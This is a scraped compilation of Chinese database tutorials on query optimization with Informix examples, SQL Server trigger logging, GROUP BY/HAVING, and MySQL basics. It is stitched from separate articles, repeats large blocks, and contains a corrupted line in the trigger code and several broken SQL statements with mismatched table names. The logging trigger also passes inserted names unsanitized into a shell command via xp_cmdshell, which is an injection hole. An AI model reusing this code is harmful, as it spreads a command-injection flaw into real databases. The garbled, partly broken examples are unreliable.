实例讲解MySQL数据库的查询优化技术

数据库系统是管理信息系统的核心，基于数据库的联机事务处理（OLTP）以及联机分析处理(OLAP)是银行、企业、政府等部门最为重要的计算机应用之一。从大多数系统的应用实例来看，查询操作在各种数据库操作中所占据的比重最大，而查询操作所基于的SELECT语句在SQL语句中又是代价最大的语句。举例来说，如果数据的量积累到一定的程度，比如一个银行的账户数据库表信息积累到上百万甚至上千万条记录，全表扫描一次往往需要数十分钟，甚至数小时。如果采用比全表扫描更好的查询策略，往往可以使查询时间降为几分钟，由此可见查询优化技术的重要性。

笔者在应用项目的实施中发现，许多程序员在利用一些前端数据库开发工具（如PowerBuilder、Delphi等）开发数据库应用程序时，只注重用户界面的华丽，并不重视查询语句的效率问题，导致所开发出来的应用系统效率低下，资源浪费严重。因此，如何设计高效合理的查询语句就显得非常重要。本文以应用实例为基础，结合数据库理论，介绍查询优化技术在现实系统中的运用。

分析问题

许多程序员认为查询优化是DBMS（数据库管理系统）的任务，与程序员所编写的SQL语句关系不大，这是错误的。一个好的查询计划往往可以使程序性能提高数十倍。查询计划是用户所提交的SQL语句的集合，查询规划是经过优化处理之后所产生的语句集合。DBMS处理查询计划的过程是这样的：在做完查询语句的词法、语法检查之后，将语句提交给DBMS的查询优化器，优化器做完代数优化和存取路径的优化之后，由预编译模块对语句进行处理并生成查询规划，然后在合适的时间提交给系统处理执行，最后将执行结果返回给用户。在实际的数据库产品(如Oracle、Sybase等)的高版本中都是采用基于代价的优化方法，这种优化能根据从系统字典表所得到的信息来估计不同的查询规划的代价，然后选择一个较优的规划。虽然现在的数据库产品在查询优化方面已经做得越来越好，但由用户提交的SQL语句是系统优化的基础，很难设想一个原本糟糕的查询计划经过系统的优化之后会变得高效，因此用户所写语句的优劣至关重要。系统所做查询优化我们暂不讨论，下面重点说明改善用户查询计划的解决方案。

解决问题

下面以关系数据库系统Informix为例，介绍改善用户查询计划的方法。

1．合理使用索引

索引是数据库中重要的数据结构，它的根本目的就是为了提高查询效率。现在大多数的数据库产品都采用IBM最先提出的ISAM索引结构。索引的使用要恰到好处，其使用原则如下：

●在经常进行连接，但是没有指定为外键的列上建立索引，而不经常连接的字段则由优化器自动生成索引。

●在频繁进行排序或分组（即进行group by或order by操作）的列上建立索引。

●在条件表达式中经常用到的不同值较多的列上建立检索，在不同值少的列上不要建立索引。比如在雇员表的“性别”列上只有“男”与“女”两个不同值，因此就无必要建立索引。如果建立索引不但不会提高查询效率，反而会严重降低更新速度。

●如果待排序的列有多个，可以在这些列上建立复合索引（compound index）。

●使用系统工具。如Informix数据库有一个tbcheck工具，可以在可疑的索引上进行检查。在一些数据库服务器上，索引可能失效或者因为频繁操作而使得读取效率降低，如果一个使用索引的查询不明不白地慢下来，可以试着用tbcheck工具检查索引的完整性，必要时进行修复。另外，当数据库表更新大量数据后，删除并重建索引可以提高查询速度。

2．避免或简化排序

应当简化或避免对大型表进行重复的排序。当能够利用索引自动以适当的次序产生输出时，优化器就避免了排序的步骤。以下是一些影响因素：

●索引中不包括一个或几个待排序的列；

●group by或order by子句中列的次序与索引的次序不一样；

●排序的列来自不同的表。

为了避免不必要的排序，就要正确地增建索引，合理地合并数据库表（尽管有时可能影响表的规范化，但相对于效率的提高是值得的）。如果排序不可避免，那么应当试图简化它，如缩小排序的列的范围等。

3．消除对大型表行数据的顺序存取

在嵌套查询中，对表的顺序存取对查询效率可能产生致命的影响。比如采用顺序存取策略，一个嵌套3层的查询，如果每层都查询1000行，那么这个查询就要查询10亿行数据。避免这种情况的主要方法就是对连接的列进行索引。例如，两个表：学生表（学号、姓名、年龄……）和选课表（学号、课程号、成绩）。如果两个表要做连接，就要在“学号”这个连接字段上建立索引。

还可以使用并集来避免顺序存取。尽管在所有的检查列上都有索引，但某些形式的where子句强迫优化器使用顺序存取。下面的查询将强迫对orders表执行顺序操作：

SELECT ＊ FROM orders WHERE (customer_num=104 AND order_num>1001) OR order_num=1008

虽然在customer_num和order_num上建有索引，但是在上面的语句中优化器还是使用顺序存取路径扫描整个表。因为这个语句要检索的是分离的行的集合，所以应该改为如下语句：

SELECT ＊ FROM orders WHERE customer_num=104 AND order_num>1001 UNION SELECT ＊ FROM orders WHERE order_num=1008

这样就能利用索引路径处理查询。

4．避免相关子查询

一个列的标签同时在主查询和where子句中的查询中出现，那么很可能当主查询中的列值改变之后，子查询必须重新查询一次。查询嵌套层次越多，效率越低，因此应当尽量避免子查询。如果子查询不可避免，那么要在子查询中过滤掉尽可能多的行。

5．避免困难的正规表达式

MATCHES和LIKE关键字支持通配符匹配，技术上叫正规表达式。但这种匹配特别耗费时间。例如：

SELECT ＊ FROM customer WHERE zipcode LIKE “98_ _ _”

即使在zipcode字段上建立了索引，在这种情况下也还是采用顺序扫描的方式。如果把语句改为SELECT ＊ FROM customer WHERE zipcode >“98000”，在执行查询时就会利用索引来查询，显然会大大提高速度。

另外，还要避免非开始的子串。例如语句：SELECT ＊ FROM customer WHERE zipcode[2，3]>“80”，在where子句中采用了非开始子串，因而这个语句也不会使用索引。

6．使用临时表加速查询

把表的一个子集进行排序并创建临时表，有时能加速查询。它有助于避免多重排序操作，而且在其他方面还能简化优化器的工作。例如：

SELECT cust.name，rcvbles.balance，……other columns FROM cust，rcvbles WHERE cust.customer_id = rcvlbes.customer_id AND rcvblls.balance>0 AND cust.postcode>“98000” ORDER BY cust.name

如果这个查询要被执行多次而不止一次，可以把所有未付款的客户找出来放在一个临时文件中，并按客户的名字进行排序：

SELECT cust.name，rcvbles.balance，……other columns FROM cust，rcvbles WHERE cust.customer_id = rcvlbes.customer_id AND rcvblls.balance>0 ORDER BY cust.name INTO TEMP cust_with_balance

然后以下面的方式在临时表中查询：

SELECT ＊ FROM cust_with_balance WHERE postcode>“98000”

临时表中的行要比主表中的行少，而且物理顺序就是所要求的顺序，减少了磁盘I/O，所以查询工作量可以得到大幅减少。

注意：临时表创建后不会反映主表的修改。在主表中数据频繁修改的情况下，注意不要丢失数据。
7．用排序来取代非顺序存取

非顺序磁盘存取是最慢的操作，表现在磁盘存取臂的来回移动。SQL语句隐藏了这一情况，使得我们在写应用程序时很容易写出要求存取大量非顺序页的查询。

有些时候，用数据库的排序能力来替代非顺序的存取能改进查询。

实例分析

下面我们举一个制造公司的例子来说明如何进行查询优化。制造公司数据库中包括3个表，模式如下所示：

1．part表

零件号　　　　　零件描述　　　　　　　　其他列

（part_num）　（part_desc）　　　　　　（other column）

102，032　　　Seageat 30G disk　　　　　……

500，049　　　Novel 10M network card　　……

……

2．vendor表

厂商号　　　　　　厂商名　　　　　　其他列

（vendor _num）　（vendor_name） （other column）

910，257　　　　　Seageat Corp　　　……

523，045　　　　　IBM Corp　　　　　……

……

3．parven表

零件号　　　　　厂商号　　　　　零件数量

（part_num）　（vendor_num）　（part_amount）

102，032　　　　910，257　　　　3,450,000

234，423　　　　321，001　　　　4，000，000

……

下面的查询将在这些表上定期运行，并产生关于所有零件数量的报表：

SELECT part_desc，vendor_name，part_amount FROM part，vendor，parven WHERE part.part_num=parven.part_num AND parven.vendor_num = vendor.vendor_num ORDER BY part.part_num

如果不建立索引，上述查询代码的开销将十分巨大。为此，我们在零件号和厂商号上建立索引。索引的建立避免了在嵌套中反复扫描。关于表与索引的统计信息如下：

表　　　　　行尺寸　　　行数量　　　　　每页行数量　　　数据页数量

（table）　(row size)　（Row count）　（Rows/Pages）　（Data Pages）

part　　　　150　　　　　10，000　　　　25　　　　　　　400

Vendor　　　150　　　　　1，000　　　　 25　　　　　　　40

Parven　　　13　　　　　 15，000　　　　300　　　　　　 50

索引　　　　　键尺寸　　　每页键数量　　　页面数量

（Indexes）　(Key Size)　（Keys/Page)　　　(Leaf Pages）

part　　　　　4　　　　　　500　　　　　　　20

Vendor　　　　4　　　　　　500　　　　　　　2

Parven　　　　8　　　　　　250　　　　　　　60

看起来是个相对简单的3表连接，但是其查询开销是很大的。通过查看系统表可以看到，在part_num上和vendor_num上有簇索引，因此索引是按照物理顺序存放的。parven表没有特定的存放次序。这些表的大小说明从缓冲页中非顺序存取的成功率很小。此语句的优化查询规划是：首先从part中顺序读取400页，然后再对parven表非顺序存取1万次，每次2页（一个索引页、一个数据页），总计2万个磁盘页，最后对vendor表非顺序存取1.5万次，合3万个磁盘页。可以看出在这个索引好的连接上花费的磁盘存取为5.04万次。

实际上，我们可以通过使用临时表分3个步骤来提高查询效率：

1．从parven表中按vendor_num的次序读数据：

SELECT part_num，vendor_num，price FROM parven ORDER BY vendor_num INTO temp pv_by_vn

这个语句顺序读parven（50页），写一个临时表（50页），并排序。假定排序的开销为200页，总共是300页。

2．把临时表和vendor表连接，把结果输出到一个临时表，并按part_num排序：

SELECT pv_by_vn，＊ vendor.vendor_num FROM pv_by_vn，vendor WHERE pv_by_vn.vendor_num=vendor.vendor_num ORDER BY pv_by_vn.part_num INTO TMP pvvn_by_pn DROP TABLE pv_by_vn

这个查询读取pv_by_vn(50页)，它通过索引存取vendor表1.5万次，但由于按vendor_num次序排列，实际上只是通过索引顺序地读vendor表（40＋2=42页），输出的表每页约95行，共160页。写并存取这些页引发5＊160=800次的读写，索引共读写892页。

3．把输出和part连接得到最后的结果：

SELECT pvvn_by_pn.＊，part.part_desc FROM pvvn_by_pn，part WHERE pvvn_by_pn.part_num=part.part_num DROP TABLE pvvn_by_pn

这样，查询顺序地读pvvn_by_pn(160页)，通过索引读part表1.5万次，由于建有索引，所以实际上进行1772次磁盘读写，优化比例为30∶1。笔者在Informix Dynamic

Sever上做同样的实验，发现在时间耗费上的优化比例为5∶1(如果增加数据量，比例可能会更大)。

小结

20％的代码用去了80％的时间，这是程序设计中的一个著名定律，在数据库应用程序中也同样如此。我们的优化要抓住关键问题，对于数据库应用程序来说，重点在于SQL的执行效率。查询优化的重点环节是使得数据库服务器少从磁盘中读数据以及顺序读页而不是非顺序读页。

实例讲解MySQL数据库的查询优化技术(二)

数据库系统是管理信息系统的核心，基于数据库的联机事务处理（OLTP）以及联机分析处理(OLAP)是银行、企业、政府等部门最为重要的计算机应用之一。 从大多数系统的应用实例来看，查询操作在各种数据库操作中所占据的比重最大，而查询操作所基于的SELECT语句在SQL语句中又是代价最大的语句。举例来说，如果数据的量积累到一定的程度，比如一个银行的账户数据库表信息积累到上百万甚至上千万条记录，全表扫描一次往往需要数十分钟，甚至数小时。如果采用比全表扫描更好的查询策略，往往可以使查询时间降为几分钟，由此可见查询优化技术的重要性。 笔者在应用项目的实施中发现，许多程序员在利用一些前端数据库开发工具（如PowerBuilder、Delphi等）开发数据库应用程序时，只注重用户界面的华丽，并不重视查询语句的效率问题，导致所开发出来的应用系统效率低下，资源浪费严重。因此，如何设计高效合理的查询语句就显得非常重要。本文以应用实例为基础，结合数据库理论，介绍查询优化技术在现实系统中的运用。 分析问题 许多程序员认为查询优化是DBMS（数据库管理系统）的任务，与程序员所编写的SQL语句关系不大，这是错误的。一个好的查询计划往往可以使程序性能提高数十倍。查询计划是用户所提交的SQL语句的集合，查询规划是经过优化处理之后所产生的语句集合。DBMS处理查询计划的过程是这样的：在做完查询语句的词法、语法检查之后，将语句提交给DBMS的查询优化器，优化器做完代数优化和存取路径的优化之后，由预编译模块对语句进行处理并生成查询规划，然后在合适的时间提交给系统处理执行，最后将执行结果返回给用户。在实际的数据库产品(如Oracle、Sybase等)的高版本中都是采用基于代价的优化方法，这种优化能根据从系统字典表所得到的信息来估计不同的查询规划的代价，然后选择一个较优的规划。虽然现在的数据库产品在查询优化方面已经做得越来越好，但由用户提交的SQL语句是系统优化的基础，很难设想一个原本糟糕的查询计划经过系统的优化之后会变得高效，因此用户所写语句的优劣至关重要。系统所做查询优化我们暂不讨论，下面重点说明改善用户查询计划的解决方案。 解决问题 下面以关系数据库系统Informix为例，介绍改善用户查询计划的方法。 1．合理使用索引 索引是数据库中重要的数据结构，它的根本目的就是为了提高查询效率。现在大多数的数据库产品都采用IBM最先提出的ISAM索引结构。索引的使用要恰到好处，其使用原则如下： ●在经常进行连接，但是没有指定为外键的列上建立索引，而不经常连接的字段则由优化器自动生成索引。 ●在频繁进行排序或分组（即进行group by或order by操作）的列上建立索引。 ●在条件表达式中经常用到的不同值较多的列上建立检索，在不同值少的列上不要建立索引。比如在雇员表的“性别”列上只有“男”与“女”两个不同值，因此就无必要建立索引。如果建立索引不但不会提高查询效率，反而会严重降低更新速度。 ●如果待排序的列有多个，可以在这些列上建立复合索引（compound index）。 ●使用系统工具。如Informix数据库有一个tbcheck工具，可以在可疑的索引上进行检查。在一些数据库服务器上，索引可能失效或者因为频繁操作而使得读取效率降低，如果一个使用索引的查询不明不白地慢下来，可以试着用tbcheck工具检查索引的完整性，必要时进行修复。另外，当数据库表更新大量数据后，删除并重建索引可以提高查询速度。 2．避免或简化排序 应当简化或避免对大型表进行重复的排序。当能够利用索引自动以适当的次序产生输出时，优化器就避免了排序的步骤。以下是一些影响因素： ●索引中不包括一个或几个待排序的列； ●group by或order by子句中列的次序与索引的次序不一样； ●排序的列来自不同的表。 为了避免不必要的排序，就要正确地增建索引，合理地合并数据库表（尽管有时可能影响表的规范化，但相对于效率的提高是值得的）。如果排序不可避免，那么应当试图简化它，如缩小排序的列的范围等。 3．消除对大型表行数据的顺序存取 在嵌套查询中，对表的顺序存取对查询效率可能产生致命的影响。比如采用顺序存取策略，一个嵌套3层的查询，如果每层都查询1000行，那么这个查询就要查询10亿行数据。避免这种情况的主要方法就是对连接的列进行索引。例如，两个表：学生表（学号、姓名、年龄……）和选课表（学号、课程号、成绩）。如果两个表要做连接，就要在“学号”这个连接字段上建立索引。 还可以使用并集来避免顺序存取。尽管在所有的检查列上都有索引，但某些形式的where子句强迫优化器使用顺序存取。下面的查询将强迫对orders表执行顺序操作：

SELECT ＊ FROM orders WHERE (customer_num=104 AND order_num>1001) OR order_num=1008

实例：用触发器生成数据库表的数据操作日志

作为一名数据库管理员，你尽力以各部门熟知的不同格式，向各部门提供它们所需要的数据。你通常将MS Excel格式的数据递交到会计部门，或将数据以HTML报表的形式呈现给普通用户。你们的系统安全管理员们则习惯于用文本阅读器或者事件查看器来查看日志。本文将介绍如何使用触发器，把DML（数据操作语言）对数据库中的特定数据表的改动记录下来。注：下列例子为Insert型触发器，不过改成Delete／Update型的触发器也很容易。
　　操作步骤首先让我们在Northwind数据库内创建一个简单表。
create table tablefortrigger
(
　track int identity(1,1) primary key,
　Lastname varchar(25),
　Firstname varchar(25)
)
　　创建好这个数据表后，添加一个标准message到master数据库的sysmessages数据表中。注意，我所添加的是一个参变量，用以接受一个字符值，它将被输出显示给管理员们。通过设置@_with_log参数为true，我们包管相关结果被发送到事件日志。
sp_addmessage 50005, 10, '%s', @with_log = true
　　现在我们创建这条用有意义的信息填充的消息。下面的信息将填充这条消息，并且记录到文件中：
　　·操作的类型（插入）。
　　·受到影响的数据表。
　　·改动的日期与时间。
　　被该语句插入的全部字段。 下面的这个触发器用预定义值（1～3个字符）创建一个字符串，该预定义值位于inserted数据表中。（这个inserted数据表驻留在内存中，它容纳被插入到触发器所在数据表的记录行）。触发器连接这些值并放到一个@msg变量。然后这个变量被传送到raiserror函数，该函数将它写到事件日志中。
Create trigger TestTrigger on
tablefortrigger
for insert
as
--声明储存消息的变量
Declare @Msg varchar(8000)
--将"操作／表名／日期时间／插入字段"赋与消息
set @Msg = 'Inserted | tablefortrigger | ' + convert(varchar(20), getdate()) + ' | '
+(select convert(varchar(5), track)
+ ', ' + lastname + ', ' + firstname
from inserted)
--产生错误发送给事件查看器。
raiserror( 50005, 10, 1, @Msg)
　　运行以下语句对触发器进行测试，然后查看事件日志：
Insert into tablefortrigger(lastname, firstname)
Values('Doe', 'John')
　　如果你打开事件日志，你应该看到以下消息：

　　既然我们已经有办法写入事件日志了，那么让我们修改一下触发器，将数据写到一个文本文件中。这次改动还须添加另一个变量@CmdString，以及使用扩展储存过程xp_cmdshell。
　　因为我们要写入文件系统，安全权限开始有影响了。所以，执行插入操作的用户必须具备该文本文件的读写权限。因此，设计一个C／S结构的应用程序供多用户运行，或许不是一个可行的解决方案。更合理的方案是，设计一个三层应用程序，由你的中间层组件对单用户数据库进行调用。在后一个方案中，对那个文本文件的权限管理其实比管理一个用户还容易。
Alter trigger TestTrigger on
tablefortrigger
for insert
as
Declare @Msg varchar(1000)
--储存将由xp_cmdshell执行的命令
Declare @CmdString varchar (2000)
set @_msg = ' insert | tablefortrigger | ' + convert ( varchar ( 20 ) , getdate ( ) ) + ' | ' + ( select convert ( varchar ( 5 ) , track ) + ' , ' + lastname + ' , ' + firstname from insert ) -
[99%]set @Msg = 'Inserted | tablefortrigger | ' + convert(varchar(20), getdate()) + ' | ' +(select convert(varchar(5), track) + ', ' + lastname + ', ' + firstname from inserted)
--产生错误发送给事件查看器。
raiserror( 50005, 10, 1, @Msg)
set @CmdString = 'echo ' + @Msg + ' >> C:\logtest.log'
--写到文本文件
exec master.dbo.xp_cmdshell @CmdString
　　让我们对它进行测试，先运行前面的插入语句，然后打开C:\logtest.log文件查看结果：
　　
Insert into tablefortrigger(lastname, firstname) Values('Doe', 'John')
　　问题解决了，对不对？哦，还没完全解决。发生多次重复插入的事件是什么原因？在这个例子中，你必须分别地处理每条记录。为了达到这个目的，我们必须用一个会带来麻烦的游标来访问"隐蔽面"。在执行以前，我必须预先给予警告。你应当了解的是，当这个应用程序进行大规模地记录插入、更新或删除时要当心，因为它可能会耗费大量的内存。
　　像你从下面看到的一样，这次我们在前面那个例子的基础上稍加调整，引入了一个游标，对该插入表的全部记录进行循环读取。每条记录分别插入一条线条，将各个事件区分开来。
ALTER trigger TestTrigger on tablefortrigger
for insert
as
Declare @Msg varchar(1000)
Declare @CmdString varchar (1000)
Declare GetinsertedCursor cursor for
Select 'Inserted | tablefortrigger | ' + convert(varchar(20), getdate()) + ' | '
+ convert(varchar(5), track)
+ ', ' + lastname + ', ' + firstname
from inserted
open GetinsertedCursor
Fetch Next from GetinsertedCursor
into @Msg
while @@fetch_status = 0
Begin
　raiserror( 50005, 10, 1, @Msg)
　Fetch Next from GetinsertedCursor
　into @Msg
　set @CmdString = 'echo ' + @Msg + ' >> C:\logtest.log'
　exec master.dbo.xp_cmdshell @CmdString
End
close Getinsertedcursor
deallocate GetInsertedCursor
　　现在让我们执行重复多次插入测试：
Insert into tablefortrigger(lastname, firstname)
Select lastname, firstname from employees
　　结论
　　在继续完成之前，有些人认为必须考虑性能与安全问题。你将看到写入文本文件的开销，而对于一个每分钟处理5000项事务的数据库来说，这样大的开销也许不可接受。由于xp_cmdshell是在SQL外操作的，写入到文件的错误不会回滚事务。倘若入侵者使用一个隐蔽的途径来改变你的数据，这个事件不会被登记到那个文本文件中。不过事件日志将记录该次DML改动。作为一次最好的实践，各事件的编号应该被用于对照日志文件的各行记录，以便发现所有的差异。
　　有很多种方法可以达到本文目标，上述脚本也可以有许多的变化。我希望你能接受这个脚本，然后作出改进并提出建议，使它更有效率。

SQL数据库使用系列 深入浅出举例应用

SQL是结构化查询语言(Structured Query Language)的缩写。这种语言允许我们对数据库进行复杂的操作。SQL语言的使用范围非常广泛。许多数据库产品都支持SQL语言，这意味着如果我们学会了SQL语言，我们可以把这种知识运用到MS Access 或 SQL Server, Oracle, DB2以及非常多的其它数据库中。

　　SQL语言运用在关系型数据库中。一个关系型数据库把数据存储在表（也称关系）中。每个数据库的主要组成就是一组表。每个表又由一组记录组成－－每条记录在表中有相同的结构，包含固定数量的具有一定类型的字段。
　　
　　下面我们来看一个实际的数据库中的表。该表的表名为cia，包含250多条记录，每个记录代表一个国家。表由5个字段组成，字段的值有的是字符串类型，有的是数字类型。

name region area population gdp
---- ------ ------ ---------- -----------
Yemen Middle East 527970 14728474 23400000000
Zaire Africa 2345410 44060636 18800000000
Zambia Africa 752610 9445723 7900000000
Zimbabwe Africa 390580 11139961 17400000000

　　下面我们可以用一些SQL语句来查询这个表中我们该兴趣的数据。

　　1. 中国的GDP是多少？

　　查询用的SQL语句为：

select gdp from cia where name='china'

　　查询结果为：

4800000000000

　　2. 给出每个地区的国家数和人口总数。并且按地区的人口数从多到少排序。

　　查询用的SQL语句为：

SELECT region, COUNT(name), SUM(population)
FROM cia
GROUP BY region
ORDER BY 3 DESC

　　查询结果为：

region COUNT(name) SUM(population)
------ ----------- ---------------
Asia 14 2963031109
Africa 59 793382933
Europe 43 580590872
....

　　怎么样，对SQL语言有了基本的了解了吧，同时对数据库，表，记录，字段等一系列在SQL语言中常用的感念也有大概的认识吧。如果不是很清楚也没关系，在接下来的内容中我们从SQL语言中最简单的内容逐步给大家作介绍，并提供丰富的练习让大家实际操作。相信学完本系列教程，你可以成为一个SQL语言的高手。

在介绍GROUP BY 和 HAVING 子句前，我们必需先讲讲sql语言中一种特殊的函数：聚合函数，例如SUM, COUNT, MAX, AVG等。这些函数和其它函数的根本区别就是它们一般作用在多条记录上。

SELECT SUM(population) FROM bbc

　　这里的SUM作用在所有返回记录的population字段上，结果就是该查询只返回一个结果，即所有国家的总人口数。

　　通过使用GROUP BY 子句，可以让SUM 和 COUNT 这些函数对属于一组的数据起作用。当你指定 GROUP BY region 时， 属于同一个region（地区）的一组数据将只能返回一行值，也就是说，表中所有除region（地区）外的字段，只能通过 SUM, COUNT等聚合函数运算后返回一个值。

　　HAVING子句可以让我们筛选成组后的各组数据，WHERE子句在聚合前先筛选记录．也就是说作用在GROUP BY 子句和HAVING子句前．
而 HAVING子句在聚合后对组记录进行筛选。

　　让我们还是通过具体的实例来理解GROUP BY 和 HAVING 子句，还采用第三节介绍的bbc表。

　　SQL实例：

　　一、显示每个地区的总人口数和总面积：

SELECT region, SUM(population), SUM(area)
FROM bbc
GROUP BY region

　　先以region把返回记录分成多个组，这就是GROUP BY的字面含义。分完组后，然后用聚合函数对每组中的不同字段（一或多条记录）作运算。

　　二、 显示每个地区的总人口数和总面积．仅显示那些面积超过1000000的地区。

SELECT region, SUM(population), SUM(area)
FROM bbc
GROUP BY region
HAVING SUM(area)>1000000

　　在这里，我们不能用where来筛选超过1000000的地区，因为表中不存在这样一条记录。

　　相反，HAVING子句可以让我们筛选成组后的各组数据．

在介绍GROUP BY 和 HAVING 子句前，我们必需先讲讲sql语言中一种特殊的函数：聚合函数，例如SUM, COUNT, MAX, AVG等。这些函数和其它函数的根本区别就是它们一般作用在多条记录上。

SELECT SUM(population) FROM bbc

　　这里的SUM作用在所有返回记录的population字段上，结果就是该查询只返回一个结果，即所有国家的总人口数。

　　通过使用GROUP BY 子句，可以让SUM 和 COUNT 这些函数对属于一组的数据起作用。当你指定 GROUP BY region 时， 属于同一个region（地区）的一组数据将只能返回一行值，也就是说，表中所有除region（地区）外的字段，只能通过 SUM, COUNT等聚合函数运算后返回一个值。

　　HAVING子句可以让我们筛选成组后的各组数据，WHERE子句在聚合前先筛选记录．也就是说作用在GROUP BY 子句和HAVING子句前．
而 HAVING子句在聚合后对组记录进行筛选。

　　让我们还是通过具体的实例来理解GROUP BY 和 HAVING 子句，还采用第三节介绍的bbc表。

　　SQL实例：

　　一、显示每个地区的总人口数和总面积：

SELECT region, SUM(population), SUM(area)
FROM bbc
GROUP BY region

　　先以region把返回记录分成多个组，这就是GROUP BY的字面含义。分完组后，然后用聚合函数对每组中的不同字段（一或多条记录）作运算。

　　二、 显示每个地区的总人口数和总面积．仅显示那些面积超过1000000的地区。

SELECT region, SUM(population), SUM(area)
FROM bbc
GROUP BY region
HAVING SUM(area)>1000000

　　在这里，我们不能用where来筛选超过1000000的地区，因为表中不存在这样一条记录。

　　相反，HAVING子句可以让我们筛选成组后的各组数据．

经验总结：mysql 的一些基本应用

基本查询
SELECT语句用于查询数据库和SQL中的所有输出操作。
SELECT c_u_name, email FROM cooya_users;
输出cooya_users表中所有行（或记录）的属性c_u_name和email的值。
如果需要所有属性，可以使用星号（*）的快捷方式。
SELECT * FROM cooya_users;
SELECT语句还可以输出不是数据库中的数据及可以用作简单的计算符。
SELECT curtime();
SELECT log(100)*4*pi();

WHERE子句
WHERE子句用作多数SELECT查询的一部分，它局限于检索匹配条件的行。
SELECT * FROM cooya_users WHERE c_u_id <= 3;
复杂一些的WHERE子句使用布尔操作符AND和OR，以及函数。
SELECT * FROM cooya_users WHERE c_u_name = 'melon' AND email='melon.cooya@gamil.com';
这将检索同时匹配两个条件的行。
SELECT c_u_id FROM cooya_users WHERE (c_u_name = 'melon' AND city LIKE 'shang%') OR email='melon.cooya@gmail.com';
这将查找c_u_name为melon且city以s打头的行，或者电子邮件地址为melon.cooya@gmail.com的顾客。
WHERE子句也是UPDATE和DELECT语句的常见组件。
UPDATE cooya_users SET c_u_name = 'cooya1' WHERE c_u_id = 2;
DELETE FROM cooya_users WHERE c_u_id = 2;

对输出排序和归组
ORDER BY
SELECT c_u_name FROM cooya_users WHERE gender='female' AND city='shanghai' ORDER BY c_u_name;
默认情况下，ORDER BY子句以升序(或ASC)排序。要以降序排序，可以使用DESC。
SELECT * FROM cooya_users WHERE city = 'shanghai' ORDER BY c_u_id DESC;
GROUP BY
GROUP BY子句与ORDER BY不同，因为它不为输出排序数据。相反，它在查询过程中就对数据进行排序，目的是为了归组或聚合。
SELECT city, COUNT(*) FROM cooya_users GROUP BY city;
该查询输出已排序的一列城市，以及居住在每个城市的顾客数COUNT。COUNT(*) FROM的作用是对每一组的行数进行计数。

DML（Data Manipulation Language，数据操纵语言）包含了所有用于操纵数据的SQL语句。下面4个语句形成DML语句集合：SELECT、INSERT、DELETE和UPDATE。本节先描述后3个语句。

插入数据
方法一：
INSERT INTO cooya_users VALUES (NULL, 'melon', 'female', 'melon.cooya@gmail.com', ' ');
方法二：
INSERT INTO cooya_users
SET c_u_name = 'cooya',
gender = 'female',
email = 'melon.cooya@gmail.com';

删除数据
SQL中的撤销和删除有很大区别。DROP用于删除表或数据库，而DELETE用于删除数据。
DELETE FROM cooya_users;
删除cooya_users表中的所有数据，但是不删除表。相反，撤销表将删除数据和表。
带WHERE子句的DELETE语句可以删除特定的行。
DELETE FROM cooya_users WHERE c_u_id = 1;

更新数据
可以使用与INSERT语句类似的语法更新数据。
UPDATE cooya_users SET email = lower(email);
UPDATE语句也常与WHERE子句一起使用。
UPDATE cooya_users SET city = 'shanghai' WHERE c_u_id = 1;

创建数据库：
mysql> CREATE DATABASE dbname;
为了处理数据库，命令解释器需要用户在能够发布SQL语句之前使用数据库。在MySql解释器中可以发布以下命令：
mysql> use dbname
以下省略命令例子的mysql>提示符。

创建表格：
CREATE TABLE cooya_users (
c_u_id int(5) default '0' not null auto_increment,
c_u_name varchar(20) not null,
gender varchar(10) not null,
email varchar(30) not null,
city varchar(20),
PRIMARY KEY (c_u_id),
KEY names (c_u_name)
);
CREATE TABLE语句有3个部分：
在CREATE TABLE语句后面是一个自由形式的表名称------在本例是cooya_users。
开始圆括号后面是一个属性名、类型、和修饰字的列表。
属性列表后面是一列键，也就是定义哪些属性满足主键的唯一性约束，以及哪些属性将为了快速访问而加以索引。
更改表和索引：
添加索引：
ALTER TABLE cooya_users ADD INDEX cities (city);
删除索引：
ALTER TABLE cooya_users DROP INDEX cities;
用show显示数据库结构



SHOW DATABASES
　列出 My SQL DBMS 可访问的数据库。

SHOW TABLES
　显示已用 use 命令选定的数据库中的表。

SHOW COLUMNS FROM tablename
　显示属性、属性的类型、鍵信息、是否允许NULL、默认值，以及表的其他信息。
　例如：
　　SHOW COLUMNS FROM customer
　显示 customer 表的属性信息。DESCRIBE table 产生相同的输出。

SHOW INDEX FROM tablename
　展示表中所有索引的详细信息，包括 PRIMARY KEY。
　例如：
　　SHOW INDEX FROM customer
　显示有两个索引，即主索引和 names 索引。

SHOW STATUS
　报告 MYSQL DBMS 性能和统计的详细信息。

MySQL的转义字符“\”
MySQL识别下列转义字符：

\0
一个ASCII 0 (NUL)字符。
\n
一个新行符。
\t
一个定位符。
\r
一个回车符。
\b
一个退格符。
\'
一个单引号(“'”)符。
\ "
一个双引号(“ "”)符。
\\
一个反斜线(“\”)符。
\%
一个“%”符。它用于在正文中搜索“%”的文字实例，否则这里“%”将解释为一个通配符。
\_ 一个“_”符。它用于在正文中搜索“_”的文字实例，否则这里“_”将解释为一个通配符。
注意，如果你在某些正文环境中使用“\%”或“\%_”，这些将返回字符串“\%”和“\_”而不是“%”和“_”。

★★
有几种方法在一个字符串内包括引号：
1、必须转义的：
一个字符串用单引号“'”来引用的，该字符串中的单引号“'”字符可以用“''”方式转义。
一个字符串用双引号“ "”来引用的，该字符串中的“ "”字符可以用“ " "”方式转义。
同时你也可以继续使用一个转义字符“\”来转义
2、可不转义的：
一个字符串用双引号“ "”来引用的，该字符串中的单引号“'”不需要特殊对待而且不必被重复或转义。同理，一个字符串用单引号“'”来引用的，该字符串中的双引号“ "”不需要特殊对待而且不必被重复或转义。

下面显示的SELECT演示引号和转义如何工作：

mysql > SELECT 'hello', ' "hello "', ' " "hello " "', 'hel''lo', '\'hello';
+----------+--------------+-------------------+----------+---------+
| hello | "hello " | " "hello " " | hel'lo | 'hello |
+----------+--------------+-------------------+----------+---------+

mysql > SELECT "hello ", "'hello' ", "''hello'' ", "hel " "lo ", "\ "hello ";
+----------+----------+-----------+------------+-----------+
| hello | 'hello' | ''hello'' | hel "lo | "hello |
+---------+-----------+-----------+------------+-----------+

mysql > SELECT "This\nIs\nFour\nlines ";
+--------------------+
| This
Is
Four
lines |
+--------------------+

★★
如果你想要把二进制数据插入到一个BLOB列，下列字符必须由转义序列表示：

NUL
ASCII 0。你应该用'\0'（一个反斜线和一个ASCII '0'）表示它。
\
ASCII 92，反斜线。用'\\'表示。
'
ASCII 39，单引号。用“\'”表示。
"
ASCII 34，双引号。用“\ "”表示。

实际应用：MySQL5存储过程编写实践

格式：

CREATE PROCEDURE 过程名 ([过程参数[,...]])     [特性 ...] 过程体

